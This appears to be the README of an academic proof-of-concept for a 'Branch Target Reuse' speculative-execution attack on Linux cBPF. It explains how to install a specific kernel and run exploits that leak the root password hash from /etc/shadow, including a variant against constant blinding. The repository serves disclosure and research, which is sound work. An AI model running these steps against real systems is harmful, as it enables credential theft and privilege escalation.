# BTR end-to-end exploit on cBPF This folder contains the two end-to-end exploits demonstrating the Branch Target Reuse (BTR) attack on Linux cBPF. Both on default Ubuntu security configuration, and with constant blinding (`bpf_jit_harden`) enabled. The file `ref_output_lion_cove.txt` show an example output while running the exploit on a Lion Cove Intel CPU. ## Linux kernel We tested the PoC with Linux kernel 6.14.0-27-generic (Ubuntu 24.04). If your distribution is Ubuntu 24 (or if you added the Ubuntu source lists), you can install the kernel via APT and boot into it for one reboot with: ```sh ./install_kernel.sh ``` This installs the kernel packages and schedules 6.14.0-27-generic to boot on the next reboot. Next, restart the machine with `sudo reboot now`. Alternatively, you can install the packages manually: ```sh # Kernel image sudo apt install linux-image-6.14.0-27-generic # Headers and modules sudo apt install linux-headers-6.14.0-27-generic linux-modules-6.14.0-27-generic linux-modules-extra-6.14.0-27-generic ``` Otherwise, you can download the image and install manually: ```sh # Kernel image wget http://archive.ubuntu.com/ubuntu/pool/main/l/linux-signed-hwe-6.14/linux-image-6.14.0-27-generic_6.14.0-27.27%7e24.04.1_amd64.deb # Kernel headers wget http://archive.ubuntu.com/ubuntu/pool/main/l/linux-hwe-6.14/linux-headers-6.14.0-27-generic_6.14.0-27.27%7e24.04.1_amd64.deb # Kernel modules wget http://archive.ubuntu.com/ubuntu/pool/main/l/linux-hwe-6.14/linux-modules-6.14.0-27-generic_6.14.0-27.27%7e24.04.1_amd64.deb wget http://archive.ubuntu.com/ubuntu/pool/main/l/linux-hwe-6.14/linux-modules-extra-6.14.0-27-generic_6.14.0-27.27%7e24.04.1_amd64.deb # You probably need to install other dependencies (it could be easier to # add the ubuntu sources and install via first approach) ``` Please reboot the machine before starting the experiments. ## Running the exploit ```sh Usage: ./main {leak_shadow, leak_dummy, test_rate} [options] -t PID of su process to leak -c Enable attack against constant blinding -p Enable the use of proc pagemap (requires sudo) -e Enable artificial eviction (requires kernel module) ``` Provide the machine to test with the `ARCH=` variable. Supported values are `LION_COVE` and `RAPTOR_COVE`. The examples below use `LION_COVE`; adjust to your machine. Test the leakage rate, skipping the huge-page finding phase by using the proc pagemap instead (`-p`): ```sh sudo ARCH=LION_COVE ./run.sh test_rate -p ``` Test the leakage rate end-to-end, i.e., including the huge-page finding phase: ```sh ARCH=LION_COVE ./run.sh test_rate ``` To leak the root password-hash (/etc/shadow) end-to-end, first launch the command `su root` in a second terminal and leave it open: ```sh su root ``` Next run the exploit in the original terminal. For the best results, restart the `su root` process before each `leak_shadow` run, so that it is located at the end of the task list: ```sh ARCH=LION_COVE ./run.sh leak_shadow ``` Leak dummy (ABC) secret, using proc-map, and artificial cache eviction (avoids cache eviction finding) ```sh cd kernel; sudo ./setup.sh; cd ../ sudo ARCH=LION_COVE ./run.sh -p -e leak_dummy ``` Note that the attack is a PoC. If a run fails, please try again, and reboot the machine on repeated failure. ## Collecting averages The scripts below repeat both experiments 20 times and write the output to a log file (by default `log_test_rate_${ARCH}.txt` and `log_leak_shadow_${ARCH}.txt`; pass a path as the first argument to override). Note that `do_test_leak_shadow.sh` again requires a `su root` process: ```sh sudo ARCH=LION_COVE ./do_test_test_rate.sh ARCH=LION_COVE ./do_test_leak_shadow.sh ``` The scripts below parse these logs, and report the leakage rate of each run and their average, as well as the time of each shadow leak, the number of successful runs, and their average time: ```sh ARCH=LION_COVE ./parse_test_rate.sh ARCH=LION_COVE ./parse_leak_shadow.sh ``` ## Exploit with constant-blinding enabled The exploit against constant-blinding enabled uses a different cBPF program (using jump offsets to encode the gadget) and a different disclosure gadget (for a higher leakage rate). To run the exploit, first make sure constant blinding (`bpf_jit_harden`) is enabled: ```sh echo "2" | sudo tee /proc/sys/net/core/bpf_jit_harden ``` Next run the exploit with the `-c` argument: ```sh ARCH=LION_COVE ./run.sh -c leak_shadow ```